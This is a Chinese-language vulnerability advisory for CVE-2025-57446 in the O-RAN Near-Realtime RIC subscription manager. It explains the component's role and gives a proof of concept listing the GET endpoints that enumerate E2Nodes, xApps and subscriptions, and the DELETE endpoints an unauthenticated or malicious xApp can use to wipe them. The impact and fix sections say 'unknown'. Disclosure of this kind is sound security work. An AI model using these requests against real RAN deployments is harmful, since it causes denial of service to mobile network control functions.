O-RAN Near-Realtime RIC漏洞CVE-2025-57446

O-RAN Near-Realtime RIC 即近实时无线接入网智能控制器，是O-RAN组织的一个入网组件，同时也是是 O-RAN 架构中的关键组件之一。

Near-Realtime RIC 负责处理时延要求小于 1 秒（通常在 50ms-200ms）的业务，如无线资源管理、切换决策、双连接控制、负载均衡等。

一、基本情况

Near-Realtime RIC 中包含了多个 xAPP，这些 xAPP 都是由第三方独立部署的应用程序，不同的 xAPP 与不同的 RAN 功能之间都相关联，

如服务质量（QoS）优化、移动性优化、切片优化、干扰缓解、负载平衡等，从而使得 RAN 的功能组件具备灵活的可编程性和可扩展性。

Near-Realtime RIC 经由 E2 接口连接到 O-DU、O-CU 以及开放式演进型 nodeB（O-enb），然后再通过 E2 接口来控制底层 RAN 元素。

栋科技漏洞库关注到O-RAN Near-Realtime RIC存在一个安全漏洞，该漏洞现在已经被追踪为CVE-2025-57446，漏洞CVSS 3.X评分7.5。

二、漏洞分析

CVE-2025-57446漏洞是存在于J-Release环境中的O-RAN近实时RIC RIC-plt-submgr中的安全漏洞，该漏洞可能导致拒绝服务等严重后果。

该漏洞源于Subscription Manager API组件容易受到特制请求攻击，远程攻击者可通过向组件发出精心编制的请求造成拒绝服务（DoS）。

漏洞可能导致攻击者利用恶意xApp删除：任何指定的订阅；与特定E2Node关联的所有订阅；由特定xApp创建的所有订阅等诸多安全隐患。

三、POC概念验证

1、您可以首先向以下端点发出GET请求，以检索有关E2Nodes、xApps和订阅的信息：

<deployment-ricplt-submgr-pod_ip>:8080/ric/v1/get_all_e2nodes
<deployment-ricplt-submgr-pod_ip>:8080/ric/v1/get_all_xapps
<deployment-ricplt-submgr-pod_ip>:8080/ric/v1/restsubscriptions
<deployment-ricplt-submgr-pod_ip>:8088/ric/v1/subscriptions
<deployment-ricplt-submgr-pod_ip>:8080/ric/v1/get_e2node_rest_subscriptions/{ranName}
<deployment-ricplt-submgr-pod_ip>:8080/ric/v1/get_xapp_rest_restsubscriptions/{xappHttpServiceName.ricxapp}

2、之后，您可以向这些端点发送DELETE请求以删除目标订阅：

<deployment-ricplt-submgr-pod_ip>:8088/ric/v1/subscriptions/{restSubId}
<deployment-ricplt-submgr-pod_ip>:8080/ric/v1/delete_all_e2node_subscriptions/{ranName}
<deployment-ricplt-submgr-pod_ip>:8080/ric/v1/delete_all_xapp_subscriptions/{xappHttpServiceName.ricxapp}

此外，您可以在xApp中将<deployment-ricplt-submgr-pod_ip>替换为service-ricplt-submgr-rmr.ricplt，从而无需知道实际的submgr ip地址。

四、影响范围

未知

五、修复建议

未知

六、参考建议

管理员已设置登录后刷新可查看